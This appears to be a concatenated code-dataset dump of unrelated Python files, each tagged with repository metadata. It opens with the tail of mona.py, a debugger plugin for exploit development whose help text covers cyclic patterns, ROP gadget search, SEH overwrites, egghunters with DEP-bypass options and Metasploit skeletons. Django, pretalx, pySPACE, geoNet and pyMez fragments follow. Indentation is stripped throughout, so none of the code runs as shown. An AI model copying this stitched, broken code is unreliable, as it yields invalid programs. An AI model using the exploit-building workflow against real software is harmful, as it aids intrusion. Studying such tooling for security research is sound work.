filecompareUsage="""Compares 2 or more files created by mona using the same output commands
Make sure to use files that are created with the same version of mona and
contain the output of the same mona command.
Mandatory argument : -f \"file1,file2,...filen\"
Put all filenames between one set of double quotes, and separate files with comma's.
You can specify a foldername as well with -f, all files in the root of that folder will be part of the compare.
Output will be written to filecompare.txt and filecompare_not.txt (not matching pointers)
Optional parameters :
-contains \"INSTRUCTION\" (will only list if instruction is found)
-nostrict (will also list pointers if instructions don't match in all files)
-range <number> : find overlapping ranges for all pointers + range.
When using -range, the -contains and -nostrict options will be ignored
-ptronly : only show matching pointers (slightly faster). Doesn't work when 'range' is used"""
patcreateUsage="""Create a cyclic pattern of a given size. Output will be written to pattern.txt
in ascii, hex and unescape() javascript format
Mandatory argument : size (numeric value)
Optional arguments :
-extended : extend the 3rd characterset (numbers) with punctuation marks etc
-c1 <chars> : set the first charset to this string of characters
-c2 <chars> : set the second charset to this string of characters
-c3 <chars> : set the third charset to this string of characters"""
patoffsetUsage="""Find the location of 4 bytes in a cyclic pattern
Mandatory argument : the 4 bytes to look for
Note : you can also specify a register
Optional arguments :
-extended : extend the 3rd characterset (numbers) with punctuation marks etc
-c1 <chars> : set the first charset to this string of characters
-c2 <chars> : set the second charset to this string of characters
-c3 <chars> : set the third charset to this string of characters
Note : the charset must match the charset that was used to create the pattern !
"""
findwildUsage = """Find instructions in memory, accepts wildcards :
Mandatory arguments :
-s <instruction#instruction#instruction> (separate instructions with #)
Optional arguments :
-b <address> : base/bottom address of the search range
-t <address> : top address of the search range
-depth <nr> : number of instructions to go deep
-all : show all instruction chains, even if they contain something that might break the chain
-distance min=nr,max=nr : you can use a numeric offset wildcard (a single *) in the first instruction of the search
the distance parameter allows you to specify the range of the offset
Inside the instructions string, you can use the following wildcards :
* = any instruction
r32 = any register
Example : pop r32#*#xor eax,eax#*#pop esi#ret
"""
findUsage= """Find a sequence of bytes in memory.
Mandatory argument : -s <pattern> : the sequence to search for. If you specified type 'file', then use -s to specify the file.
This file needs to be a file created with mona.py, containing pointers at the begin of each line.
Optional arguments:
-type <type> : Type of pattern to search for : bin,asc,ptr,instr,file
-b <address> : base/bottom address of the search range
-t <address> : top address of the search range
-c : skip consecutive pointers but show length of the pattern instead
-p2p : show pointers to pointers to the pattern (might take a while !)
this setting equals setting -level to 1
-level <number> : do recursive (p2p) searches, specify number of levels deep
if you want to look for pointers to pointers, set level to 1
-offset <number> : subtract a value from a pointer at a certain level
-offsetlevel <number> : level to subtract a value from a pointer
-r <number> : if p2p is used, you can tell the find to also find close pointers by specifying -r with a value.
This value indicates the number of bytes to step backwards for each search
-unicode : used in conjunction with search type asc, this will convert the search pattern to unicode first
-ptronly : Only show the pointers, skip showing info about the pointer (slightly faster)"""
assembleUsage = """Convert instructions to opcode. Separate multiple instructions with #.
Mandatory argument : -s <instructions> : the sequence of instructions to assemble to opcode"""
infoUsage = """Show information about a given address in the context of the loaded application
Mandatory argument : -a <address> : the address to query"""
dumpUsage = """Dump the specified memory range to a file. Either the end address or the size of
buffer needs to be specified.
Mandatory arguments :
-s <address> : start address
-f <filename> : the name of the file where to write the bytes
Optional arguments:
-n <size> : the number of bytes to copy (size of the buffer)
-e <address> : the end address of the copy"""
compareUsage = """Compares contents of a binary file with locations in memory.
Mandatory argument :
-f <filename> : full path to binary file
Optional argument :
-a <address> : the exact address of the bytes in memory (address or register).
If you don't specify an address, I will try to locate the bytes in memory
by looking at the first 8 bytes.
-s : skip locations that belong to a module
-unicode : perform unicode search. Note: input should *not* be unicode, it will be expanded automatically"""
offsetUsage = """Calculate the number of bytes between two addresses. You can use
registers instead of addresses.
Mandatory arguments :
-a1 <address> : the first address/register
-a2 <address> : the second address/register"""
bpUsage = """Set a breakpoint when a given address is read from, written to or executed
Mandatory arguments :
-a <address> : the address where to set the breakpoint
(absolute address / register / modulename!functionname)
-t <type> : type of the breakpoint, can be READ, WRITE or SFX"""
bfUsage = """Set a breakpoint on exported or imported function(s) of the selected modules.
Mandatory argument :
-t <type> : type of breakpoint action. Can be 'add', 'del' or 'list'
Optional arguments :
-f <function type> : set to 'import' or 'export' to read IAT or EAT. Default : export
-s <func,func,func> : specify function names.
If you want a bp on all functions, set -s to *"""
nosafesehUsage = """Show modules that are not safeseh protected"""
nosafesehaslrUsage = """Show modules that are not safeseh protected, not subject to ASLR, and won't get rebased either"""
noaslrUsage = """Show modules that are not subject to ASLR and won't get rebased"""
findmspUsage = """Finds begin of a cyclic pattern in memory, looks if one of the registers contains (is overwritten) with a cyclic pattern
or points into a cyclic pattern. findmsp will also look if a SEH record is overwritten and finally,
it will look for cyclic patterns on the stack, and pointers to cyclic pattern on the stack.
Optional argument :
-distance <value> : distance from ESP, applies to search on the stack. Default : search entire stack
Note : you can use the same options as with pattern_create and pattern_offset in terms of defining the character set to use"""
suggestUsage = """Suggests an exploit buffer structure based on pointers to a cyclic pattern
Note : you can use the same options as with pattern_create and pattern_offset in terms of defining the character set to use
Mandatory argument in case you are using WinDBG or x64dbg:
-t <type:arg> : skeletontype. Valid types are :
tcpclient:port, udpclient:port, fileformat:extension
Examples : -t tcpclient:21
-t fileformat:pdf"""
bytearrayUsage = """Creates a byte array, can be used to find bad characters
Optional arguments :
-cpb <bytes> : bytes to exclude from the array. Example : '\\x00\\x0a\\x0d'
Note: you can specify wildcards using ..
Example: '\\x00\\x0a..\\x20\\x32\\x7f..\\xff'
-r : show array backwards (reversed), starting at \\xff
Output will be written to bytearray.txt, and binary output will be written to bytearray.bin"""
headerUsage = """Convert contents of a binary file to code that can be run to produce the file
Mandatory argument :
-f <filename> : source filename
Optional argument:
-t <type> : specify type of output. Valid choices are 'ruby' (default) or 'python' """
updateUsage = """Update mona to the latest version
Optional argument :
-http : Use http instead of https"""
getpcUsage = """Find getpc routine for specific register
Mandatory argument :
-r : register (ex: eax)"""
eggUsage = """Creates an egghunter routine
Optional arguments :
-t : tag (ex: w00t). Default value is w00t
-c : enable checksum routine. Only works in conjunction with parameter -f
-f <filename> : file containing the shellcode
-startreg <reg> : start searching at the address pointed by this reg
-wow64 : generate wow64 egghunter. Default is traditional 32bit egghunter
DEP Bypass options :
-depmethod <method> : method can be "virtualprotect", "copy" or "copy_size"
-depreg <reg> : sets the register that contains a pointer to the API function to bypass DEP.
By default this register is set to ESI
-depsize <value> : sets the size for the dep bypass routine
-depdest <reg> : this register points to the location of the egghunter itself.
When bypassing DEP, the egghunter is already marked as executable.
So when using the copy or copy_size methods, the DEP bypass in the egghunter
would do a "copy 2 self". In order to be able to do so, it needs a register
where it can copy the shellcode to.
If you leave this empty, the code will contain a GetPC routine."""
stacksUsage = """Shows all stacks for each thread in the running application"""
skeletonUsage = """Creates a Metasploit exploit module skeleton for a specific type of exploit
Mandatory argument in case you are using WinDBG:
-t <type:arg> : skeletontype. Valid types are :
tcpclient:port, udpclient:port, fileformat:extension
Examples : -t tcpclient:21
-t fileformat:pdf
Optional arguments :
-s : size of the cyclic pattern (default : 5000)
"""
heapUsage = """Show information about various heap chunk lists
Mandatory arguments :
-h <address> : base address of the heap to query
-t <type> : where type is 'segments', 'chunks', 'layout',
'fea' (let mona determine the frontend allocator),
'lal' (force display of LAL FEA, only on XP/2003),
'lfh' (force display of LFH FEA (Vista/Win7/...)),
'bea' (backend allocator, mona will automatically determine what it is),
'all' (show all information)
Note: 'layout' will show all heap chunks and their vtables & strings. Use on WinDBG for maximum results.
Optional arguments :
-expand : Works only in combination with 'layout', will include VA/LFH/... chunks in the search.
VA/LFH chunks may be very big, so this might slow down the search.
	-stat : show statistics (also works in combination with -h heap, -t segments or -t chunks)
-size <nr> : only show strings of at least the specified size. Works in combination with 'layout'
-after <data> : only show current & next chunk layout entries when an entry contains this data
(Only works in combination with 'layout')
-v : show data / write verbose info to the Log window"""
getiatUsage = """Show IAT entries from selected module(s)
Optional arguments :
-s <keywords> : only show IAT entries that contain one of these keywords"""
geteatUsage = """Show EAT entries from selected module(s)
Optional arguments :
-s <keywords> : only show EAT entries that contain one of these keywords"""
deferUsage = """Set a deferred breakpoint
Mandatory arguments :
-a <target>,<target>,...
target can be an address, a modulename.functionname or module.dll+offset (hex value)
Warning, modulename.functionname is case sensitive !
"""
calltraceUsage = """Logs all CALL instructions
Mandatory arguments :
-m module : specify what module to search for CALL instructions (global option)
Optional arguments :
-a <number> : number of arguments to show for each CALL
-r : also trace RETN instructions (will slow down process!)"""
fillchunkUsage = """Fills a heap chunk, referenced by a register, with A's (or another character)
Mandatory arguments :
-r <reg/reference> : reference to heap chunk to fill
Optional arguments :
-b <character or byte to use to fill up chunk>
-s <size> : if the referenced chunk is not found, and a size is defined with -s,
memory will be filled anyway, up to the specified size"""
getpageACLUsage = """List all mapped pages and show the ACL associated with each page
Optional arguments :
-a <address> : only show page information around this address.
(Page before, current page and page after will be displayed)"""
bpsehUsage = """Sets a breakpoint on all current SEH Handler function pointers"""
kbUsage = """Manage knowledgebase data
Mandatory arguments:
-<type> : type can be 'list', 'set' or 'del'
To 'set' ( = add / update ) a KB entry, or 'del' an entry,
you will need to specify 2 additional arguments:
-id <id> : the Knowledgebase ID
-value <value> : the value to add/update. In case of lists, use a comma to separate entries.
The -list parameter will show all current ID's
To see the contents of a specific ID, use the -id <id> parameter."""
macroUsage = """Manage macros for WinDBG
Arguments:
-run <macroname> : run the commands defined in the specified macro
-show <macroname> : show all commands defined in the specified macro
-add <macroname> : create a new macro
-set <macroname> -index <nr> -cmd <windbg command(s)> : edit a macro
	If you set the -cmd value to #, the command at the specified index
will be removed. If you have specified an existing index, the command
at that position will be replaced, unless you've also specified the -insert parameter.
	If you have not specified an index, the command will be appended to the list.
-set <macroname> -file <filename> : will tell this macro to execute all instructions in the
specified file. You can only enter one file per macro.
-del <macroname> -iamsure: remove the specified macro. Use with care, I won't ask if you're sure."""
sehchainUsage = """Displays the SEH chain for the current thread.
This command will also attempt to display offsets and suggest a payload structure
in case a cyclic pattern was used to overwrite the chain."""
heapCookieUsage = """Will attempt to find reliable writeable pointers that can help avoiding
a heap cookie check during an arbitrary free on Windows XP"""
hidedebugUsage = """Will attempt to hide the debugger from the process"""
gflagsUsage = """Will show the currently set GFlags, based on the PEB.NtGlobalFlag value"""
fwptrUsage = """Search for calls to pointers in a writeable location,
will assist with finding a good target for 4byte arbitrary writes
Optional arguments:
-bp : Set breakpoints on all found CALL instructions
-patch : Patch the target of each CALL with 0x41414141
-chunksize <nr> : only list the pointer if location-8 bytes contains a size value larger than <nr>
(size in blocks, not bytes)
-offset <nr> : add <nr> bytes of offset within chunk, after flink/blink pointer
(use in combination with -freelist and -chunksize <nr>)
	-freelist : Search for fwptr that are preceded by 2 readable pointers that can act as flink/blink"""
allocmemUsage = """Allocate RWX memory in the debugged process.
Optional arguments:
-s <size> : desired size of allocated chunk. VirtualAlloc will allocate at least 0x1000 bytes,
but this size argument is only useful when used in combination with -fill.
-a <address> : desired target location for allocation, set to start of chunk to allocate.
-acl <level> : overrule default RWX memory protection.
-fill : fill 'size' bytes (-s) of memory at specified address (-a) with A's.
-force : use in combination with -fill, in case page was already mapped but you still want to
fill the chunk at the desired location.
-b <byte> : Specify what byte to write to the desired location. Defaults to '\\x41'
"""
changeaclUsage = """Change the ACL of a given page.
Arguments:
-a <address> : Address belonging to the page that needs to be changed
-acl <level> : New ACL. Valid values are R,RW,RXW,RX,N,GUARD,NOCACHE,WC"""
infodumpUsage = """Dumps contents of memory to file. Contents will include all pages that don't
belong to stack, heap or loaded modules.
Output will be written to infodump.xml"""
pebUsage = """Show the address of the Process Environment Block (PEB)"""
tebUsage = """Show the address of the Thread Environment Block (TEB) for the current thread"""
encUsage = """Encode a series of bytes
Arguments:
-t <type> : Type of encoder to use. Allowed value(s) are alphanum
-s <bytes> : The bytes to encode (or use -f instead)
-f <path to file> : The full path to the binary file that contains the bytes to encode"""
stringUsage = """Read a string from memory or write a string to memory
Arguments:
-r : Read a string, use in combination with -a
-w : Write a string, use in combination with -a and -s
	-noterminate : Do not terminate the string (use in combination with -w)
-u : use UTF-16 (Unicode) mode
-s <string> : The string to write
-a <address> : The location to read from or write to"""
unicodealignUsage = """Generates a venetian shellcode alignment stub which can be placed directly before unicode shellcode.
Arguments:
-a <address> : Specify the address where the alignment code will start/be placed
: If -a is not specified, the current value in EIP will be used.
-l : Prepend alignment with a null byte compensating nop equivalent
(Use this if the last instruction before the alignment routine 'leaks' a null byte)
-b <reg> : Set the bufferregister, defaults to eax
-t <seconds> : Time in seconds to run heuristics (defaults to 15)
-ebp <value> : Overrule the use of the 'current' value of ebp,
ebp/address will be used to calculate offset to shellcode"""
copyUsage = """Copies bytes from one location to another.
Arguments:
-src <address> : The source address
-dst <address> : The destination address
-n <number> : The number of bytes to copy"""
dumpobjUsage = """Dump the contents of an object.
Arguments:
-a <address> : Address of object
-s <number> : Size of object (default value: 0x28 or size of chunk)
Optional arguments:
-l <number> : Recursively dump objects
-m <number> : Size for recursive objects (default value: 0x28)
"""
dumplogUsage = """Dump all objects recorded in an alloc/free log
Note: dumplog will only dump objects that have not been freed in the same logfile.
Expected syntax for log entries:
Alloc : 'alloc(size in hex) = address'
Free : 'free(address)'
Additional text after the alloc & free info is fine.
Just make sure the syntax matches exactly with the examples above.
Arguments:
-f <path/to/logfile> : Full path to the logfile
Optional arguments:
-l <number> : Recursively dump objects
-m <number> : Size for recursive objects (default value: 0x28)"""
tobpUsage = """Generate WinDBG syntax to set a logging breakpoint at a given location
Arguments:
-a <address> : Location (address, register) for logging breakpoint
Optional arguments:
-e : Execute breakpoint command right away"""
flowUsage = """Simulates execution flows from current location (EIP), tries all conditional jump combinations
Optional arguments:
-e <address> : Show execution flows that will reach specified address
-avoid <address,address,...> : Only show paths that don't contain any of the pointers to avoid
-n <nr> : Max nr of instructions, default: 60
-cl <nr> : Max level of CALL to follow in detail, default: 3
-cs <nr> : Don't show details of first <nr> CALL/child functions. default: 0
-func : Show function names (slows down process)."""
evalUsage = """Evaluates an expression
Arguments:
<the expression to evaluate>
Accepted syntax includes:
hex values, decimal values (prefixed with 0n), registers,
module names, 'heap' ( = address of default process heap),
module!functionname
simple math operations"""
diffheapUsage = """Compare current heap layout with previously saved state
Arguments:
-save : save current state to disk
-diff : compare current state with previously saved state"""
commands["seh"] = MnCommand("seh", "Find pointers to assist with SEH overwrite exploits",sehUsage, procFindSEH)
commands["config"] = MnCommand("config","Manage configuration file (mona.ini)",configUsage,procConfig,"conf")
commands["jmp"] = MnCommand("jmp","Find pointers that will allow you to jump to a register",jmpUsage,procFindJMP, "j")
commands["ropfunc"] = MnCommand("ropfunc","Find pointers to pointers (IAT) to interesting functions that can be used in your ROP chain",ropfuncUsage,procFindROPFUNC)
commands["rop"] = MnCommand("rop","Finds gadgets that can be used in a ROP exploit and do ROP magic with them",ropUsage,procROP)
commands["jop"] = MnCommand("jop","Finds gadgets that can be used in a JOP exploit",jopUsage,procJOP)
commands["stackpivot"] = MnCommand("stackpivot","Finds stackpivots (move stackpointer to controlled area)",stackpivotUsage,procStackPivots)
commands["modules"] = MnCommand("modules","Show all loaded modules and their properties",modulesUsage,procShowMODULES,"mod")
commands["filecompare"] = MnCommand("filecompare","Compares 2 or more files created by mona using the same output commands",filecompareUsage,procFileCOMPARE,"fc")
commands["pattern_create"] = MnCommand("pattern_create","Create a cyclic pattern of a given size",patcreateUsage,procCreatePATTERN,"pc")
commands["pattern_offset"] = MnCommand("pattern_offset","Find location of 4 bytes in a cyclic pattern",patoffsetUsage,procOffsetPATTERN,"po")
commands["find"] = MnCommand("find", "Find bytes in memory", findUsage, procFind,"f")
commands["findwild"] = MnCommand("findwild", "Find instructions in memory, accepts wildcards", findwildUsage, procFindWild,"fw")
commands["assemble"] = MnCommand("assemble", "Convert instructions to opcode. Separate multiple instructions with #",assembleUsage,procAssemble,"asm")
commands["info"] = MnCommand("info", "Show information about a given address in the context of the loaded application",infoUsage,procInfo)
commands["dump"] = MnCommand("dump", "Dump the specified range of memory to a file", dumpUsage,procDump)
commands["offset"] = MnCommand("offset", "Calculate the number of bytes between two addresses", offsetUsage, procOffset)
commands["compare"] = MnCommand("compare","Compare contents of a binary file with a copy in memory", compareUsage, procCompare,"cmp")
commands["breakpoint"] = MnCommand("bp","Set a memory breakpoint on read/write or execute of a given address", bpUsage, procBp,"bp")
commands["nosafeseh"] = MnCommand("nosafeseh", "Show modules that are not safeseh protected", nosafesehUsage, procModInfoS)
commands["nosafesehaslr"] = MnCommand("nosafesehaslr", "Show modules that are not safeseh protected, not aslr and not rebased", nosafesehaslrUsage, procModInfoSA)
commands["noaslr"] = MnCommand("noaslr", "Show modules that are not aslr or rebased", noaslrUsage, procModInfoA)
commands["findmsp"] = MnCommand("findmsp","Find cyclic pattern in memory", findmspUsage,procFindMSP,"findmsf")
commands["suggest"] = MnCommand("suggest","Suggest an exploit buffer structure", suggestUsage,procSuggest)
commands["bytearray"] = MnCommand("bytearray","Creates a byte array, can be used to find bad characters",bytearrayUsage,procByteArray,"ba")
commands["header"] = MnCommand("header","Read a binary file and convert content to a nice 'header' string",headerUsage,procPrintHeader)
commands["update"] = MnCommand("update","Update mona to the latest version",updateUsage,procUpdate,"up")
commands["getpc"] = MnCommand("getpc","Show getpc routines for specific registers",getpcUsage,procgetPC)
commands["egghunter"] = MnCommand("egghunter","Create egghunter code",eggUsage,procEgg,"egg")
commands["stacks"] = MnCommand("stacks","Show all stacks for all threads in the running application",stacksUsage,procStacks)
commands["skeleton"] = MnCommand("skeleton","Create a Metasploit module skeleton with a cyclic pattern for a given type of exploit",skeletonUsage,procSkeleton)
commands["breakfunc"] = MnCommand("breakfunc","Set a breakpoint on an exported function in on or more dll's",bfUsage,procBf,"bf")
commands["heap"] = MnCommand("heap","Show heap related information",heapUsage,procHeap)
commands["getiat"] = MnCommand("getiat","Show IAT of selected module(s)",getiatUsage,procGetIAT,"iat")
commands["geteat"] = MnCommand("geteat","Show EAT of selected module(s)",geteatUsage,procGetEAT,"eat")
commands["pageacl"] = MnCommand("pageacl","Show ACL associated with mapped pages",getpageACLUsage,procPageACL,"pacl")
commands["bpseh"] = MnCommand("bpseh","Set a breakpoint on all current SEH Handler function pointers",bpsehUsage,procBPSeh,"sehbp")
commands["kb"] = MnCommand("kb","Manage Knowledgebase data",kbUsage,procKb,"kb")
commands["encode"] = MnCommand("encode","Encode a series of bytes",encUsage,procEnc,"enc")
commands["unicodealign"] = MnCommand("unicodealign","Generate venetian alignment code for unicode stack buffer overflow",unicodealignUsage,procUnicodeAlign,"ua")
#commands["heapcookie"] = MnCommand("heapcookie","Looks for writeable pointers that can help avoiding cookie check during arbitrary free",heapCookieUsage,procHeapCookie,"hc")
if __DEBUGGERAPP__ == "Immunity Debugger" or __DEBUGGERAPP__ == 'x64dbg':
commands["deferbp"] = MnCommand("deferbp","Set a deferred breakpoint",deferUsage,procBu,"bu")
commands["calltrace"] = MnCommand("calltrace","Log all CALL instructions",calltraceUsage,procCallTrace,"ct")
if __DEBUGGERAPP__ == "WinDBG":
commands["fillchunk"] = MnCommand("fillchunk","Fill a heap chunk referenced by a register",fillchunkUsage,procFillChunk,"fchunk")
commands["dumpobj"] = MnCommand("dumpobj","Dump the contents of an object",dumpobjUsage,procDumpObj,"do")
commands["dumplog"] = MnCommand("dumplog","Dump objects present in alloc/free log file",dumplogUsage,procDumpLog,"dl")
commands["changeacl"] = MnCommand("changeacl","Change the ACL of a given page",changeaclUsage,procChangeACL,"ca")
commands["allocmem"] = MnCommand("allocmem","Allocate some memory in the process",allocmemUsage,procAllocMem,"alloc")
commands["tobp"] = MnCommand("tobp","Generate WinDBG syntax to create a logging breakpoint at given location",tobpUsage,procToBp,"2bp")
commands["flow"] = MnCommand("flow","Simulate execution flows, including all branch combinations",flowUsage,procFlow,"flw")
#commands["diffheap"] = MnCommand("diffheap", "Compare current heap layout with previously saved state", diffheapUsage, procDiffHeap, "dh")
commands["fwptr"] = MnCommand("fwptr", "Find Writeable Pointers that get called", fwptrUsage, procFwptr, "fwp")
commands["sehchain"] = MnCommand("sehchain","Show the current SEH chain",sehchainUsage,procSehChain,"exchain")
commands["hidedebug"] = MnCommand("hidedebug","Attempt to hide the debugger",hidedebugUsage,procHideDebug,"hd")
commands["gflags"] = MnCommand("gflags", "Show current GFlags settings from PEB.NtGlobalFlag", gflagsUsage, procFlags, "gf")
commands["infodump"] = MnCommand("infodump","Dumps specific parts of memory to file", infodumpUsage, procInfoDump,"if")
commands["peb"] = MnCommand("peb","Show location of the PEB",pebUsage,procPEB,"peb")
commands["teb"] = MnCommand("teb","Show TEB related information",tebUsage,procTEB,"teb")
commands["string"] = MnCommand("string","Read or write a string from/to memory",stringUsage,procString,"str")
commands["copy"] = MnCommand("copy","Copy bytes from one location to another",copyUsage,procCopy,"cp")
commands["?"] = MnCommand("?","Evaluate an expression",evalUsage,procEval,"eval")
# get the options
opts = {}
last = ""
arguments = []
argcopy = copy.copy(args)
aline = " ".join(a for a in argcopy)
if __DEBUGGERAPP__ == "WinDBG":
aline = "!py " + aline
else:
aline = "!mona " + aline
dbg.log("[+] Command used:")
dbg.log("%s" % aline)
# in case we're not using Immunity
if "-showargs" in args:
dbg.log("-" * 50)
dbg.log("args: %s" % args)
if len(args) > 0:
if args[0].lower().startswith("mona") or args[0].lower().endswith("mona") or args[0].lower().endswith("mona.py"):
args.pop(0)
if len(args) >= 2:
arguments = args[1:]
if "-showargs" in args:
dbg.log("arguments: %s" % arguments)
for word in arguments:
if (word[0] == '-'):
word = word.lstrip("-")
opts[word] = True
last = word
else:
if (last != ""):
if str(opts[last]) == "True":
opts[last] = word
else:
opts[last] = opts[last] + " " + word
#last = ""
# if a command only requires a value and not a switch ?
# then we'll drop the value into dictionary with key "?"
if len(args) > 1 and args[1][0] != "-":
opts["?"] = args[1]
if len(args) < 1:
commands["help"].parseProc(opts)
return("")
command = args[0]
if "-showargs" in args:
dbg.log("command: %s" % command)
dbg.log("-" * 50)
args.remove("-showargs")
arguments.remove("-showargs")
# ----- execute the chosen command ----- #
if command in commands:
if command.lower().strip() == "help":
commands[command].parseProc(args)
else:
commands[command].parseProc(opts)
else:
# maybe it's an alias
aliasfound = False
for cmd in commands:
if commands[cmd].alias == command:
commands[cmd].parseProc(opts)
aliasfound = True
if not aliasfound:
commands["help"].parseProc(None)
return("** Invalid command **")
# ----- report ----- #
endtime = datetime.datetime.now()
delta = endtime - starttime
dbg.log("")
dbg.log("[+] This mona.py action took %s" % str(delta))
dbg.setStatusBar("Done")
except:
dbg.log("*" * 80,highlight=True)
dbg.logLines(traceback.format_exc(),highlight=True)
dbg.log("*" * 80,highlight=True)
dbg.error(traceback.format_exc())
return ""
def mona(args_str):
main(args_str.split())
if __name__ == "__main__":
dbg.log("Hold on...")
# do we need to profile ?
doprofile = False
if "-profile" in sys.argv:
doprofile = True
dbg.log("Starting profiler...")
cProfile.run('main(sys.argv)', 'monaprofile')
else:
main(sys.argv)
if doprofile:
dbg.log("[+] Showing profile stats...")
p = pstats.Stats('monaprofile')
dbg.log(" ***** ALL *****")
p.print_stats()
dbg.log(" ***** CUMULATIVE *****")
p.sort_stats('cumulative').print_stats(30)
dbg.log(" ***** TIME *****")
p.sort_stats('time', 'cum').print_stats(30)
# clear memory
if __DEBUGGERAPP__ == "WinDBG" or __DEBUGGERAPP__ == "x64dbg":
dbglib.clearvars()
try:
# allvars = [var for var in globals() if var[0] != "_"]
# for var in allvars:
# del globals()[var]
resetGlobals()
dbg = None
except:
pass
| 45.156384 | 368 | 0.46592 | ["BSD-3-Clause"] | Shtrikh17/mona | monaFile.py | 833,632 | Python |
import pytest
from pretalx.event.models import Organiser
from pretalx.event.utils import create_organiser_with_team
@pytest.mark.django_db
def test_user_organiser_init(user):
assert Organiser.objects.count() == 0
assert user.teams.count() == 0
create_organiser_with_team(name='Name', slug='slug', users=[user])
assert Organiser.objects.count() == 1
assert user.teams.count() == 1
assert user.teams.get().organiser == Organiser.objects.get()
| 31.2 | 70 | 0.741453 | ["Apache-2.0"] | orlando/pretalx | src/tests/event/test_event_utils.py | 468 | Python |
# -*- coding: utf-8 -*-
import sys
from django.test import SimpleTestCase
from django.test.utils import override_settings
from .forms import (CustomNamingForm, DefaultNamingForm, MixedNamingForm,
MultipleNamingForm)
class TestWidget(SimpleTestCase):
def test_custom_naming(self):
html = CustomNamingForm().as_p()
self.assertIn('name="location"', html)
self.assertIn('data-lat-field="latitude"', html)
self.assertIn('data-lon-field="longitude"', html)
self.assertIn('name="latitude"', html)
self.assertIn('name="longitude"', html)
self.assertIn(
'<script type="application/javascript">'
'$(function(){$("#id_location").osmfield();});'
'</script>',
html
)
def test_default_naming(self):
html = DefaultNamingForm().as_p()
self.assertIn('name="location"', html)
self.assertIn('data-lat-field="location_lat"', html)
self.assertIn('data-lon-field="location_lon"', html)
self.assertIn('name="location_lat"', html)
self.assertIn('name="location_lon"', html)
self.assertIn(
'<script type="application/javascript">'
'$(function(){$("#id_location").osmfield();});'
'</script>',
html
)
def test_mixed_naming(self):
html = MixedNamingForm().as_p()
self.assertIn('name="location"', html)
self.assertIn('data-lat-field="location_lat"', html)
self.assertIn('data-lon-field="longitude"', html)
self.assertIn('name="location_lat"', html)
self.assertIn('name="longitude"', html)
self.assertIn(
'<script type="application/javascript">'
'$(function(){$("#id_location").osmfield();});'
'</script>',
html
)
def test_multiple_naming(self):
html = MultipleNamingForm().as_p()
self.assertIn('name="default_location"', html)
self.assertIn('data-lat-field="default_location_lat"', html)
self.assertIn('data-lon-field="default_location_lon"', html)
self.assertIn('name="default_location_lat"', html)
self.assertIn('name="default_location_lon"', html)
self.assertIn(
'<script type="application/javascript">'
'$(function(){$("#id_default_location").osmfield();});'
'</script>',
html
)
self.assertIn('name="custom_location"', html)
self.assertIn('data-lat-field="custom_latitude"', html)
self.assertIn('data-lon-field="custom_longitude"', html)
self.assertIn('name="custom_latitude"', html)
self.assertIn('name="custom_longitude"', html)
self.assertIn(
'<script type="application/javascript">'
'$(function(){$("#id_custom_location").osmfield();});'
'</script>',
html
)
class TestMedia(SimpleTestCase):
@override_settings(DEBUG=True)
def test_css_debug(self):
css = DefaultNamingForm().media.render_css()
self.assertEqual(
'<link href="css/vendor/leaflet.css" type="text/css" media="screen" rel="stylesheet" />'
'<link href="css/osm_field.css" type="text/css" media="screen" rel="stylesheet" />',
''.join(css)
)
def test_css_no_debug(self):
css = DefaultNamingForm().media.render_css()
self.assertEqual(
'<link href="css/vendor/leaflet.css" type="text/css" media="screen" rel="stylesheet" />'
'<link href="css/osm_field.min.css" type="text/css" media="screen" rel="stylesheet" />',
''.join(css)
)
@override_settings(DEBUG=True)
def test_js_debug(self):
js = DefaultNamingForm().media.render_js()
self.assertEqual(
'<script type="text/javascript" src="js/vendor/leaflet.js"></script>'
'<script type="text/javascript" src="js/osm_field.js"></script>',
''.join(js)
)
def test_js_no_debug(self):
js = DefaultNamingForm().media.render_js()
self.assertEqual(
'<script type="text/javascript" src="js/vendor/leaflet.js"></script>'
'<script type="text/javascript" src="js/osm_field.min.js"></script>',
''.join(js)
)
| 36.965812 | 100 | 0.589364 | ["MIT"] | sinnwerkstatt/django-osm-field | tests/test_forms.py | 4,325 | Python |
""" Visualize the single different data samples or averages
All visualization nodes are zero-processing nodes, i.e. their execute method
returns exactly the data that it gets as parameter. However, when the data
is passed through the visualization node, it performs different kinds of
analysis and creates some plots of the data. In principle, visualization nodes
can be plugged between two arbitrary other nodes;
however some nodes expect that the data contains some meta-information like
channel- or feature names.
Many of the nodes are trainable even though they don't really learn a model (they
don't process the data anyway). The reason for that is that they require
information about the class labels for creating the plots.
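As an illustration only (the class and method names below are assumptions made for
this sketch, not the actual pySPACE node API), the zero-processing pattern described
above looks roughly like this:

    class SketchedVisualizationNode(object):
        def __init__(self):
            self.samples_per_label = {}

        def train(self, data, label):
            # "training" only records the label information needed later for the plots
            self.samples_per_label.setdefault(label, []).append(data)

        def execute(self, data):
            # create or update plots here, then pass the data through unchanged
            return data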
"""
| 49.066667 | 78 | 0.80163 | ["BSD-3-Clause"] | pyspace/pyspace | pySPACE/missions/nodes/visualization/__init__.py | 736 | Python |
from distutils.core import setup
setup(name='geoNet',
version='1.0',
packages=['geoNet',
'geoNet.gmpe',
],
)
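# Illustrative use of this distutils script (standard distutils commands, listed here
# only as a reminder; nothing project-specific is assumed):
#   python setup.py install
#   python setup.py sdist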
| 17.777778 | 32 | 0.475 | ["MIT"] | ucgmsim/Pre-processing | geoNet/setup.py | 160 | Python |
"""CovidDetector URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include("main.urls"))
]
| 34.73913 | 77 | 0.704631 | ["Unlicense", "MIT"] | anupam-tiwari/Def-Hacks-2020 | CovidDetector/urls.py | 799 | Python |
#-----------------------------------------------------------------------------
# Name: GraphModels
# Purpose: To store graphs used in network translations
# Author: Aric Sanders
# Created: 4/6/2016
# License: MIT License
#-----------------------------------------------------------------------------
"""
Graph Models stores sub classes of graphs that define data translations. All edges
or the functions that define translations from one format to another
are found in <a href="./Translations.m.html">`pyMez.Code.DataHandlers.Translations`</a>.
Currently, the module networkx is used to display the graph.
Examples
--------
#!python
>>from pyMez import *
>>image_graph=ImageGraph()
>>image_graph.set_state('png','my_png.png')
>>image_graph.move_to_node('EmbeddedHtml')
>>output=image_graph.data
